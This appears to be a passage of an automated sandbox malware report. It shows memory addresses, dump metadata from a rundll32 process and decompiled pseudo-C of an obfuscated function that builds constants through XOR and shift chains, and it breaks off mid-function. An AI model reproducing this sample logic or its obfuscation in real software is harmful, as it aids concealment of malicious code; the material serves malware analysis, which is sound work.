                                                                                                                                    0x002d2dff
                                                                                                                                    0x002d2e0a
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3c09
                                                                                                                                    0x002d3787
                                                                                                                                    0x002d378d
                                                                                                                                    0x002d3a80
                                                                                                                                    0x002d3a86
                                                                                                                                    0x002d3b54
                                                                                                                                    0x002d3b5a
                                                                                                                                    0x002d3bde
                                                                                                                                    0x002d3be3
                                                                                                                                    0x002d3be5
                                                                                                                                    0x002d3bf6
                                                                                                                                    0x002d3bf6
                                                                                                                                    0x002d3a28
                                                                                                                                    0x002d3a28
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3a28
                                                                                                                                    0x002d3b5c
                                                                                                                                    0x002d3b62
                                                                                                                                    0x002d3baf
                                                                                                                                    0x002d3bbb
                                                                                                                                    0x002d3bc4
                                                                                                                                    0x002d3bcc
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3bcc
                                                                                                                                    0x002d3b64
                                                                                                                                    0x002d3b6a
                                                                                                                                    0x002d3ba1
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3ba1
                                                                                                                                    0x002d3b6c
                                                                                                                                    0x002d3b6e
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3b90
                                                                                                                                    0x002d3b97
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3b97
                                                                                                                                    0x002d3a8c
                                                                                                                                    0x002d3b3d
                                                                                                                                    0x002d3b42
                                                                                                                                    0x002d3b44
                                                                                                                                    0x002d4009
                                                                                                                                    0x002d4010
                                                                                                                                    0x002d4010
                                                                                                                                    0x002d3b4a
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3b4a
                                                                                                                                    0x002d3a92
                                                                                                                                    0x002d3a98
                                                                                                                                    0x002d3b0f
                                                                                                                                    0x002d3b21
                                                                                                                                    0x002d3b27
                                                                                                                                    0x002d3b28
                                                                                                                                    0x002d3b2f
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3b2f
                                                                                                                                    0x002d3a9a
                                                                                                                                    0x002d3aa0
                                                                                                                                    0x002d3ae5
                                                                                                                                    0x002d3aec
                                                                                                                                    0x002d3af1
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3af1
                                                                                                                                    0x002d3aa2
                                                                                                                                    0x002d3aa8
                                                                                                                                    0x002d3ad6
                                                                                                                                    0x002d3adb
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3adb
                                                                                                                                    0x002d3aaa
                                                                                                                                    0x002d3ab0
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3ab6
                                                                                                                                    0x002d3abd
                                                                                                                                    0x002d3abf
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3abf
                                                                                                                                    0x002d3793
                                                                                                                                    0x002d3a70
                                                                                                                                    0x002d3a75
                                                                                                                                    0x002d3a76
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3a76
                                                                                                                                    0x002d3799
                                                                                                                                    0x002d379f
                                                                                                                                    0x002d38e1
                                                                                                                                    0x002d38e7
                                                                                                                                    0x002d39f9
                                                                                                                                    0x002d3a00
                                                                                                                                    0x002d3a02
                                                                                                                                    0x002d3a32
                                                                                                                                    0x002d3a39
                                                                                                                                    0x002d3a3c
                                                                                                                                    0x002d3a48
                                                                                                                                    0x002d3a4a
                                                                                                                                    0x002d3a51
                                                                                                                                    0x002d3a51
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3a51
                                                                                                                                    0x002d3a4c
                                                                                                                                    0x002d3a4f
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3a4f
                                                                                                                                    0x002d3a3e
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3a3e
                                                                                                                                    0x002d3a1d
                                                                                                                                    0x002d3a23
                                                                                                                                    0x002d3a24
                                                                                                                                    0x002d3a26
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3a26
                                                                                                                                    0x002d38ed
                                                                                                                                    0x002d38f3
                                                                                                                                    0x002d3fd7
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3fdc
                                                                                                                                    0x002d38f9
                                                                                                                                    0x002d38ff
                                                                                                                                    0x002d3959
                                                                                                                                    0x002d3965
                                                                                                                                    0x002d398e
                                                                                                                                    0x002d3995
                                                                                                                                    0x002d399a
                                                                                                                                    0x002d39b7
                                                                                                                                    0x002d39bd
                                                                                                                                    0x002d39d5
                                                                                                                                    0x00000000
                                                                                                                                    0x002d39da
                                                                                                                                    0x002d3901
                                                                                                                                    0x002d3907
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3914
                                                                                                                                    0x002d3919
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3919
                                                                                                                                    0x002d37a5
                                                                                                                                    0x002d3895
                                                                                                                                    0x002d389a
                                                                                                                                    0x002d389c
                                                                                                                                    0x002d38c5
                                                                                                                                    0x002d38ce
                                                                                                                                    0x002d38d6
                                                                                                                                    0x002d389e
                                                                                                                                    0x002d38a2
                                                                                                                                    0x002d38ab
                                                                                                                                    0x002d38b3
                                                                                                                                    0x002d38b3
                                                                                                                                    0x00000000
                                                                                                                                    0x002d389c
                                                                                                                                    0x002d37b1
                                                                                                                                    0x002d3881
                                                                                                                                    0x002d3887
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3887
                                                                                                                                    0x002d37bd
                                                                                                                                    0x002d3850
                                                                                                                                    0x002d3855
                                                                                                                                    0x002d385c
                                                                                                                                    0x002d3864
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3864
                                                                                                                                    0x002d37c5
                                                                                                                                    0x002d37f6
                                                                                                                                    0x002d37fb
                                                                                                                                    0x002d3802
                                                                                                                                    0x00000000
                                                                                                                                    0x002d3802
                                                                                                                                    0x002d37cd
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002d37de
                                                                                                                                    0x002d37e5
                                                                                                                                    0x00000000
                                                                                                                                    0x002d37eb
                                                                                                                                    0x002d37eb
                                                                                                                                    0x00000000
                                                                                                                                    0x002d37eb
                                                                                                                                    0x002d37e5
                                                                                                                                    0x002d3c13
                                                                                                                                    0x002d3c19
                                                                                                                                    0x002d3e40
                                                                                                                                    0x002d3e46
                                                                                                                                    0x002d3edd
                                                                                                                                    0x002d3ee3
                                                                                                                                    0x002d3f9b
                                                                                                                                    0x002d3fa0
                                                                                                                                    0x002d3fa2
                                                                                                                                    0x002d3e13
                                                                                                                                    0x002d3e13
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: )If$D}$D}$G$TRr$Y2($\Q$c{v$n)+$orh$rZM*${)t${)t$`$u#$xy
                                                                                                                                    • API String ID: 0-2742041174
                                                                                                                                    • Opcode ID: f457af18da1968f184e130b4c9dd99d2ca228f58459823416dde8edda6753f57
                                                                                                                                    • Instruction ID: 7aecd2809b8fda123f873e96561a0299285746d3d30e5acb9445c364cdbec205
                                                                                                                                    • Opcode Fuzzy Hash: f457af18da1968f184e130b4c9dd99d2ca228f58459823416dde8edda6753f57
                                                                                                                                    • Instruction Fuzzy Hash: 08C223B15183818BD378DF25C58ABCFBBE1BB84314F10891EE5D99A260DBB09959CF43
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                    			E002C2BD9(intOrPtr __ecx) {
                                                                                                                                    				char _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				char _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				intOrPtr _v56;
                                                                                                                                    				char* _v60;
                                                                                                                                    				intOrPtr _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				intOrPtr _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				char _v80;
                                                                                                                                    				intOrPtr _v84;
                                                                                                                                    				char _v88;
                                                                                                                                    				char _v92;
                                                                                                                                    				char _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				signed int _v104;
                                                                                                                                    				signed int _v108;
                                                                                                                                    				signed int _v112;
                                                                                                                                    				signed int _v116;
                                                                                                                                    				signed int _v120;
                                                                                                                                    				signed int _v124;
                                                                                                                                    				signed int _v128;
                                                                                                                                    				signed int _v132;
                                                                                                                                    				signed int _v136;
                                                                                                                                    				signed int _v140;
                                                                                                                                    				signed int _v144;
                                                                                                                                    				signed int _v148;
                                                                                                                                    				signed int _v152;
                                                                                                                                    				signed int _v156;
                                                                                                                                    				signed int _v160;
                                                                                                                                    				signed int _v164;
                                                                                                                                    				signed int _v168;
                                                                                                                                    				signed int _v172;
                                                                                                                                    				signed int _v176;
                                                                                                                                    				signed int _v180;
                                                                                                                                    				signed int _v184;
                                                                                                                                    				unsigned int _v188;
                                                                                                                                    				signed int _v192;
                                                                                                                                    				signed int _v196;
                                                                                                                                    				signed int _v200;
                                                                                                                                    				signed int _v204;
                                                                                                                                    				signed int _v208;
                                                                                                                                    				signed int _v212;
                                                                                                                                    				signed int _v216;
                                                                                                                                    				signed int _v220;
                                                                                                                                    				signed int _v224;
                                                                                                                                    				signed int _v228;
                                                                                                                                    				signed int _v232;
                                                                                                                                    				signed int _v236;
                                                                                                                                    				signed int _v240;
                                                                                                                                    				signed int _v244;
                                                                                                                                    				signed int _v248;
                                                                                                                                    				signed int _v252;
                                                                                                                                    				signed int _v256;
                                                                                                                                    				signed int _v260;
                                                                                                                                    				signed int _v264;
                                                                                                                                    				signed int _v268;
                                                                                                                                    				signed int _v272;
                                                                                                                                    				signed int _v276;
                                                                                                                                    				signed int _v280;
                                                                                                                                    				signed int _v284;
                                                                                                                                    				signed int _v288;
                                                                                                                                    				signed int _v292;
                                                                                                                                    				signed int _v296;
                                                                                                                                    				signed int _v300;
                                                                                                                                    				signed int _v304;
                                                                                                                                    				signed int _v308;
                                                                                                                                    				signed int _v312;
                                                                                                                                    				signed int _v316;
                                                                                                                                    				signed int _v320;
                                                                                                                                    				signed int _v324;
                                                                                                                                    				signed int _v328;
                                                                                                                                    				signed int _v332;
                                                                                                                                    				signed int _v336;
                                                                                                                                    				signed int _v340;
                                                                                                                                    				signed int _v344;
                                                                                                                                    				signed int _v348;
                                                                                                                                    				signed int _v352;
                                                                                                                                    				signed int _v356;
                                                                                                                                    				signed int _v360;
                                                                                                                                    				signed int _v364;
                                                                                                                                    				signed int _v368;
                                                                                                                                    				signed int _v372;
                                                                                                                                    				signed int _v376;
                                                                                                                                    				signed int _v380;
                                                                                                                                    				signed int _v384;
                                                                                                                                    				signed int _v388;
                                                                                                                                    				signed int _v392;
                                                                                                                                    				signed int _v396;
                                                                                                                                    				void* _t716;
                                                                                                                                    				void* _t717;
                                                                                                                                    				void* _t718;
                                                                                                                                    				intOrPtr _t730;
                                                                                                                                    				intOrPtr _t732;
                                                                                                                                    				void* _t733;
                                                                                                                                    				signed int _t735;
                                                                                                                                    				void* _t741;
                                                                                                                                    				intOrPtr _t746;
                                                                                                                                    				intOrPtr _t752;
                                                                                                                                    				intOrPtr _t754;
                                                                                                                                    				intOrPtr _t755;
                                                                                                                                    				void* _t757;
                                                                                                                                    				void* _t759;
                                                                                                                                    				intOrPtr _t760;
                                                                                                                                    				void* _t766;
                                                                                                                                    				signed int _t772;
                                                                                                                                    				signed int _t773;
                                                                                                                                    				signed int _t774;
                                                                                                                                    				signed int _t775;
                                                                                                                                    				signed int _t776;
                                                                                                                                    				signed int _t777;
                                                                                                                                    				signed int _t778;
                                                                                                                                    				signed int _t779;
                                                                                                                                    				signed int _t780;
                                                                                                                                    				signed int _t781;
                                                                                                                                    				signed int _t782;
                                                                                                                                    				void* _t783;
                                                                                                                                    				intOrPtr _t792;
                                                                                                                                    				void* _t807;
                                                                                                                                    				void* _t812;
                                                                                                                                    				void* _t842;
                                                                                                                                    				intOrPtr _t848;
                                                                                                                                    				void* _t864;
                                                                                                                                    				intOrPtr _t866;
                                                                                                                                    				signed int _t867;
                                                                                                                                    				void* _t868;
                                                                                                                                    				void* _t873;
                                                                                                                                    				signed int* _t875;
                                                                                                                                    				void* _t878;
                                                                                                                                    
                                                                                                                                    				_t875 =  &_v396;
                                                                                                                                    				_v56 = 0xa0cd19;
                                                                                                                                    				_t873 = 0;
                                                                                                                                    				_v84 = __ecx;
                                                                                                                                    				_v52 = _v52 & 0;
                                                                                                                                    				_t766 = 0x41de8e2;
                                                                                                                                    				_v48 = _v48 & 0;
                                                                                                                                    				_v300 = 0x1109eb;
                                                                                                                                    				_v300 = _v300 + 0xcb;
                                                                                                                                    				_v300 = _v300 | 0xecff95c2;
                                                                                                                                    				_v300 = _v300 ^ 0xa1bddbbd;
                                                                                                                                    				_v252 = 0xe28eec;
                                                                                                                                    				_v252 = _v252 + 0x19d6;
                                                                                                                                    				_v252 = _v252 | 0xcaf404bd;
                                                                                                                                    				_v252 = _v252 ^ 0xcaf6acfe;
                                                                                                                                    				_v124 = 0x517500;
                                                                                                                                    				_v124 = _v124 + 0x84ec;
                                                                                                                                    				_v124 = _v124 ^ 0x0051f9ec;
                                                                                                                                    				_v344 = 0xbde49;
                                                                                                                                    				_t772 = 0x31;
                                                                                                                                    				_v344 = _v344 * 0x35;
                                                                                                                                    				_v344 = _v344 << 9;
                                                                                                                                    				_v344 = _v344 + 0x7afe;
                                                                                                                                    				_v344 = _v344 ^ 0xea0ab4fe;
                                                                                                                                    				_v232 = 0xd06c4e;
                                                                                                                                    				_v232 = _v232 | 0x98bd8447;
                                                                                                                                    				_v232 = _v232 + 0xffff492f;
                                                                                                                                    				_v232 = _v232 ^ 0x98fd357e;
                                                                                                                                    				_v236 = 0xf2a19d;
                                                                                                                                    				_v236 = _v236 << 8;
                                                                                                                                    				_v236 = _v236 | 0xeb063d66;
                                                                                                                                    				_v236 = _v236 ^ 0xfba7bd66;
                                                                                                                                    				_v304 = 0x7cba75;
                                                                                                                                    				_v304 = _v304 << 0x10;
                                                                                                                                    				_v304 = _v304 >> 0xd;
                                                                                                                                    				_v304 = _v304 ^ 0x0005d3a8;
                                                                                                                                    				_v220 = 0xced2db;
                                                                                                                                    				_v220 = _v220 >> 0xb;
                                                                                                                                    				_v220 = _v220 * 0x6a;
                                                                                                                                    				_v220 = _v220 ^ 0x000ab444;
                                                                                                                                    				_v356 = 0x98a5e4;
                                                                                                                                    				_v356 = _v356 ^ 0xdd9204f6;
                                                                                                                                    				_v356 = _v356 | 0x4689a95f;
                                                                                                                                    				_v356 = _v356 * 0x48;
                                                                                                                                    				_v356 = _v356 ^ 0xdf47a2b8;
                                                                                                                                    				_v292 = 0x99ac6b;
                                                                                                                                    				_v292 = _v292 * 0x35;
                                                                                                                                    				_v292 = _v292 / _t772;
                                                                                                                                    				_v292 = _v292 ^ 0x00a637e1;
                                                                                                                                    				_v348 = 0x8d86f8;
                                                                                                                                    				_v348 = _v348 + 0x9ec9;
                                                                                                                                    				_v348 = _v348 + 0xfffff441;
                                                                                                                                    				_v348 = _v348 * 0x3a;
                                                                                                                                    				_v348 = _v348 ^ 0x2031e474;
                                                                                                                                    				_v208 = 0x39dd97;
                                                                                                                                    				_v208 = _v208 << 0x10;
                                                                                                                                    				_v208 = _v208 + 0x9a19;
                                                                                                                                    				_v208 = _v208 ^ 0xdd979a19;
                                                                                                                                    				_v100 = 0xd2197;
                                                                                                                                    				_v100 = _v100 + 0x97e4;
                                                                                                                                    				_v100 = _v100 ^ 0x000db95b;
                                                                                                                                    				_v324 = 0x771ce;
                                                                                                                                    				_v324 = _v324 << 1;
                                                                                                                                    				_v324 = _v324 ^ 0x580a954c;
                                                                                                                                    				_v324 = _v324 ^ 0x580cba62;
                                                                                                                                    				_v352 = 0xd79a55;
                                                                                                                                    				_t867 = 0x4d;
                                                                                                                                    				_v352 = _v352 / _t867;
                                                                                                                                    				_v352 = _v352 << 5;
                                                                                                                                    				_v352 = _v352 + 0xffffa0ed;
                                                                                                                                    				_v352 = _v352 ^ 0x005b1fb1;
                                                                                                                                    				_v264 = 0xbc6795;
                                                                                                                                    				_v264 = _v264 + 0x99f5;
                                                                                                                                    				_v264 = _v264 | 0xde86e00c;
                                                                                                                                    				_v264 = _v264 ^ 0xdeb9ffad;
                                                                                                                                    				_v240 = 0x2649df;
                                                                                                                                    				_v240 = _v240 + 0x8f57;
                                                                                                                                    				_v240 = _v240 + 0xffffdcf3;
                                                                                                                                    				_v240 = _v240 ^ 0x002859eb;
                                                                                                                                    				_v180 = 0x284ff;
                                                                                                                                    				_v180 = _v180 + 0xfffffbe4;
                                                                                                                                    				_v180 = _v180 ^ 0x0004b053;
                                                                                                                                    				_v248 = 0x43d81c;
                                                                                                                                    				_t773 = 0x2c;
                                                                                                                                    				_v248 = _v248 * 0x30;
                                                                                                                                    				_v248 = _v248 + 0x77f1;
                                                                                                                                    				_v248 = _v248 ^ 0x0cb65cea;
                                                                                                                                    				_v164 = 0x561af9;
                                                                                                                                    				_v164 = _v164 * 0x5f;
                                                                                                                                    				_v164 = _v164 ^ 0x1ff767f2;
                                                                                                                                    				_v172 = 0x424117;
                                                                                                                                    				_v172 = _v172 / _t773;
                                                                                                                                    				_v172 = _v172 ^ 0x000edcdb;
                                                                                                                                    				_v336 = 0xedf003;
                                                                                                                                    				_v336 = _v336 + 0xffff11da;
                                                                                                                                    				_v336 = _v336 >> 2;
                                                                                                                                    				_v336 = _v336 >> 9;
                                                                                                                                    				_v336 = _v336 ^ 0x000c05d4;
                                                                                                                                    				_v216 = 0xec53cc;
                                                                                                                                    				_v216 = _v216 | 0x30e2710b;
                                                                                                                                    				_v216 = _v216 * 0x1f;
                                                                                                                                    				_v216 = _v216 ^ 0xeced0588;
                                                                                                                                    				_v224 = 0xc36dcc;
                                                                                                                                    				_v224 = _v224 * 0x64;
                                                                                                                                    				_v224 = _v224 * 0xc;
                                                                                                                                    				_v224 = _v224 ^ 0x9413d5fd;
                                                                                                                                    				_v148 = 0x5fde01;
                                                                                                                                    				_v148 = _v148 ^ 0x51967584;
                                                                                                                                    				_v148 = _v148 ^ 0x51c7dbee;
                                                                                                                                    				_v156 = 0x26546c;
                                                                                                                                    				_v156 = _v156 ^ 0x8ec08bcd;
                                                                                                                                    				_v156 = _v156 ^ 0x8eeee361;
                                                                                                                                    				_v396 = 0x210674;
                                                                                                                                    				_v396 = _v396 ^ 0xb585172f;
                                                                                                                                    				_v396 = _v396 >> 9;
                                                                                                                                    				_v396 = _v396 ^ 0x5fa8c9ed;
                                                                                                                                    				_v396 = _v396 ^ 0x5ff25ba7;
                                                                                                                                    				_v112 = 0xa4fdb5;
                                                                                                                                    				_v112 = _v112 ^ 0x7ac22777;
                                                                                                                                    				_v112 = _v112 ^ 0x7a606cfd;
                                                                                                                                    				_v160 = 0x7fe066;
                                                                                                                                    				_v160 = _v160 | 0xe6d7910f;
                                                                                                                                    				_v160 = _v160 ^ 0xe6fe40a3;
                                                                                                                                    				_v152 = 0xb045a1;
                                                                                                                                    				_v152 = _v152 ^ 0x0733bf74;
                                                                                                                                    				_v152 = _v152 ^ 0x078d93a6;
                                                                                                                                    				_v384 = 0x7bd524;
                                                                                                                                    				_v384 = _v384 + 0xffff236c;
                                                                                                                                    				_v384 = _v384 * 0x7b;
                                                                                                                                    				_v384 = _v384 + 0xffffb98b;
                                                                                                                                    				_v384 = _v384 ^ 0x3b1735e1;
                                                                                                                                    				_v392 = 0x61d9a1;
                                                                                                                                    				_v392 = _v392 + 0xab93;
                                                                                                                                    				_v392 = _v392 + 0xffff054c;
                                                                                                                                    				_v392 = _v392 | 0xc62dc39c;
                                                                                                                                    				_v392 = _v392 ^ 0xc661791a;
                                                                                                                                    				_v376 = 0x1528d1;
                                                                                                                                    				_v376 = _v376 << 8;
                                                                                                                                    				_v376 = _v376 + 0xffff31a1;
                                                                                                                                    				_v376 = _v376 >> 9;
                                                                                                                                    				_v376 = _v376 ^ 0x000f3b72;
                                                                                                                                    				_v268 = 0x199e3d;
                                                                                                                                    				_v268 = _v268 ^ 0x3c18ecc0;
                                                                                                                                    				_v268 = _v268 >> 0xf;
                                                                                                                                    				_v268 = _v268 ^ 0x00085298;
                                                                                                                                    				_v116 = 0x9d324d;
                                                                                                                                    				_t774 = 0x5b;
                                                                                                                                    				_v116 = _v116 * 0x35;
                                                                                                                                    				_v116 = _v116 ^ 0x2088a224;
                                                                                                                                    				_v144 = 0xea008e;
                                                                                                                                    				_v144 = _v144 * 0x31;
                                                                                                                                    				_v144 = _v144 ^ 0x2cc3d943;
                                                                                                                                    				_v200 = 0xbe23d7;
                                                                                                                                    				_v200 = _v200 / _t774;
                                                                                                                                    				_v200 = _v200 ^ 0x0006a720;
                                                                                                                                    				_v368 = 0xbc3a01;
                                                                                                                                    				_v368 = _v368 >> 2;
                                                                                                                                    				_v368 = _v368 << 1;
                                                                                                                                    				_v368 = _v368 | 0x91e27348;
                                                                                                                                    				_v368 = _v368 ^ 0x91f48308;
                                                                                                                                    				_v312 = 0x81ba05;
                                                                                                                                    				_v312 = _v312 ^ 0x6d6d273d;
                                                                                                                                    				_v312 = _v312 + 0x9af1;
                                                                                                                                    				_v312 = _v312 ^ 0x6ded9aad;
                                                                                                                                    				_v320 = 0xa9a2ca;
                                                                                                                                    				_v320 = _v320 / _t867;
                                                                                                                                    				_t775 = 0x39;
                                                                                                                                    				_v320 = _v320 / _t775;
                                                                                                                                    				_v320 = _v320 ^ 0x0005ef3e;
                                                                                                                                    				_v136 = 0x8e55db;
                                                                                                                                    				_t776 = 0xb;
                                                                                                                                    				_v136 = _v136 / _t776;
                                                                                                                                    				_v136 = _v136 ^ 0x00010f6d;
                                                                                                                                    				_v296 = 0x9a02a3;
                                                                                                                                    				_v296 = _v296 | 0xc0bbeea6;
                                                                                                                                    				_v296 = _v296 ^ 0xfebfff47;
                                                                                                                                    				_v296 = _v296 ^ 0x3e0de8e7;
                                                                                                                                    				_v196 = 0x628794;
                                                                                                                                    				_v196 = _v196 >> 7;
                                                                                                                                    				_v196 = _v196 ^ 0x00033c53;
                                                                                                                                    				_v360 = 0xc75687;
                                                                                                                                    				_t777 = 0x55;
                                                                                                                                    				_v360 = _v360 / _t777;
                                                                                                                                    				_t778 = 0x4a;
                                                                                                                                    				_v360 = _v360 / _t778;
                                                                                                                                    				_t779 = 0x66;
                                                                                                                                    				_v360 = _v360 / _t779;
                                                                                                                                    				_v360 = _v360 ^ 0x0006bc1c;
                                                                                                                                    				_v288 = 0xb89ddb;
                                                                                                                                    				_t780 = 0x5c;
                                                                                                                                    				_v288 = _v288 * 0x7b;
                                                                                                                                    				_v288 = _v288 + 0x220a;
                                                                                                                                    				_v288 = _v288 ^ 0x58b2320e;
                                                                                                                                    				_v108 = 0x352a49;
                                                                                                                                    				_v108 = _v108 | 0x42677ea4;
                                                                                                                                    				_v108 = _v108 ^ 0x427d3f06;
                                                                                                                                    				_v332 = 0x1123f9;
                                                                                                                                    				_v332 = _v332 + 0xfffffbdd;
                                                                                                                                    				_v332 = _v332 + 0xffff8b7f;
                                                                                                                                    				_v332 = _v332 | 0xcf6269e1;
                                                                                                                                    				_v332 = _v332 ^ 0xcf7a63e7;
                                                                                                                                    				_v192 = 0x15ba5c;
                                                                                                                                    				_v192 = _v192 + 0xffff7d63;
                                                                                                                                    				_v192 = _v192 ^ 0x0011de47;
                                                                                                                                    				_v204 = 0xd88287;
                                                                                                                                    				_v204 = _v204 >> 1;
                                                                                                                                    				_v204 = _v204 ^ 0x006fcfd9;
                                                                                                                                    				_v308 = 0x394063;
                                                                                                                                    				_v308 = _v308 | 0x23438f89;
                                                                                                                                    				_v308 = _v308 ^ 0x95557e79;
                                                                                                                                    				_v308 = _v308 ^ 0xb625da34;
                                                                                                                                    				_v260 = 0x6632ca;
                                                                                                                                    				_v260 = _v260 << 0xc;
                                                                                                                                    				_v260 = _v260 / _t780;
                                                                                                                                    				_v260 = _v260 ^ 0x011a1b64;
                                                                                                                                    				_v316 = 0x1ead1d;
                                                                                                                                    				_v316 = _v316 >> 0xf;
                                                                                                                                    				_v316 = _v316 << 0xe;
                                                                                                                                    				_v316 = _v316 ^ 0x000acc6a;
                                                                                                                                    				_v388 = 0xc01c7d;
                                                                                                                                    				_v388 = _v388 >> 9;
                                                                                                                                    				_v388 = _v388 | 0xa159bc3f;
                                                                                                                                    				_v388 = _v388 ^ 0x1058b9c4;
                                                                                                                                    				_v388 = _v388 ^ 0xb10bd724;
                                                                                                                                    				_v256 = 0x2459a9;
                                                                                                                                    				_v256 = _v256 + 0xffff58c0;
                                                                                                                                    				_v256 = _v256 >> 0xc;
                                                                                                                                    				_v256 = _v256 ^ 0x000386a3;
                                                                                                                                    				_v340 = 0xa38d0b;
                                                                                                                                    				_t781 = 0x78;
                                                                                                                                    				_v340 = _v340 / _t781;
                                                                                                                                    				_v340 = _v340 ^ 0x3e3bd45c;
                                                                                                                                    				_v340 = _v340 + 0xf3c0;
                                                                                                                                    				_v340 = _v340 ^ 0x3e3a819a;
                                                                                                                                    				_v380 = 0x2dd945;
                                                                                                                                    				_v380 = _v380 << 4;
                                                                                                                                    				_v380 = _v380 + 0xffffb7c2;
                                                                                                                                    				_v380 = _v380 << 6;
                                                                                                                                    				_v380 = _v380 ^ 0xb75574a7;
                                                                                                                                    				_v272 = 0xf6939e;
                                                                                                                                    				_v272 = _v272 | 0x851c2f86;
                                                                                                                                    				_v272 = _v272 + 0xffff0412;
                                                                                                                                    				_v272 = _v272 ^ 0x85fd1a3b;
                                                                                                                                    				_v188 = 0x2c17e;
                                                                                                                                    				_v188 = _v188 >> 3;
                                                                                                                                    				_v188 = _v188 ^ 0x000c5ae0;
                                                                                                                                    				_v280 = 0xf08b81;
                                                                                                                                    				_v280 = _v280 | 0x75266007;
                                                                                                                                    				_v280 = _v280 ^ 0xc75f894a;
                                                                                                                                    				_v280 = _v280 ^ 0xb2a4e63e;
                                                                                                                                    				_v372 = 0x6f48a0;
                                                                                                                                    				_v372 = _v372 << 0xa;
                                                                                                                                    				_v372 = _v372 >> 0x10;
                                                                                                                                    				_v372 = _v372 | 0x5e122b7b;
                                                                                                                                    				_v372 = _v372 ^ 0x5e16ce05;
                                                                                                                                    				_v184 = 0x747075;
                                                                                                                                    				_v184 = _v184 + 0xcea0;
                                                                                                                                    				_v184 = _v184 ^ 0x007a5d3b;
                                                                                                                                    				_v128 = 0x4ebeca;
                                                                                                                                    				_v128 = _v128 + 0xffffee54;
                                                                                                                                    				_v128 = _v128 ^ 0x004a846f;
                                                                                                                                    				_v120 = 0xe78fe5;
                                                                                                                                    				_t868 = 0x80c65ec;
                                                                                                                                    				_v120 = _v120 + 0xffff4f7b;
                                                                                                                                    				_t864 = 0xf9e92c1;
                                                                                                                                    				_v120 = _v120 ^ 0x00e2ece2;
                                                                                                                                    				_v276 = 0xe2917e;
                                                                                                                                    				_v276 = _v276 << 6;
                                                                                                                                    				_v276 = _v276 + 0xffff0dfb;
                                                                                                                                    				_v276 = _v276 ^ 0x38a72339;
                                                                                                                                    				_v176 = 0x1ec236;
                                                                                                                                    				_v176 = _v176 ^ 0x7af5486d;
                                                                                                                                    				_v176 = _v176 ^ 0x7aeb8f45;
                                                                                                                                    				_v244 = 0x4d92e1;
                                                                                                                                    				_t782 = 0x5f;
                                                                                                                                    				_v88 = 0x20;
                                                                                                                                    				_v244 = _v244 * 0x4a;
                                                                                                                                    				_v244 = _v244 | 0x7c3f7c28;
                                                                                                                                    				_v244 = _v244 ^ 0x7e7c1ac2;
                                                                                                                                    				_v284 = 0xc8aa60;
                                                                                                                                    				_v284 = _v284 + 0x32b9;
                                                                                                                                    				_v284 = _v284 + 0xffff127a;
                                                                                                                                    				_v284 = _v284 ^ 0x00c1b775;
                                                                                                                                    				_v228 = 0x32f957;
                                                                                                                                    				_v228 = _v228 << 0xa;
                                                                                                                                    				_v228 = _v228 ^ 0xe304a089;
                                                                                                                                    				_v228 = _v228 ^ 0x28edcf32;
                                                                                                                                    				_v364 = 0x1a55e7;
                                                                                                                                    				_v364 = _v364 * 0x68;
                                                                                                                                    				_v364 = _v364 * 0x36;
                                                                                                                                    				_v364 = _v364 ^ 0xa842ca33;
                                                                                                                                    				_v364 = _v364 ^ 0xe9f59c27;
                                                                                                                                    				_v168 = 0x34b570;
                                                                                                                                    				_v168 = _v168 | 0x6b6928c5;
                                                                                                                                    				_v168 = _v168 ^ 0x6b739674;
                                                                                                                                    				_v104 = 0x8a8082;
                                                                                                                                    				_v104 = _v104 * 0x3f;
                                                                                                                                    				_v104 = _v104 ^ 0x2214377a;
                                                                                                                                    				_v212 = 0x18307b;
                                                                                                                                    				_v212 = _v212 ^ 0x4b6e1055;
                                                                                                                                    				_v212 = _v212 ^ 0x41119872;
                                                                                                                                    				_v212 = _v212 ^ 0x0a6c434c;
                                                                                                                                    				_v132 = 0x8b3f3c;
                                                                                                                                    				_v132 = _v132 << 2;
                                                                                                                                    				_v132 = _v132 ^ 0x022c35f2;
                                                                                                                                    				_v328 = 0x314aa5;
                                                                                                                                    				_v328 = _v328 | 0xbabb419f;
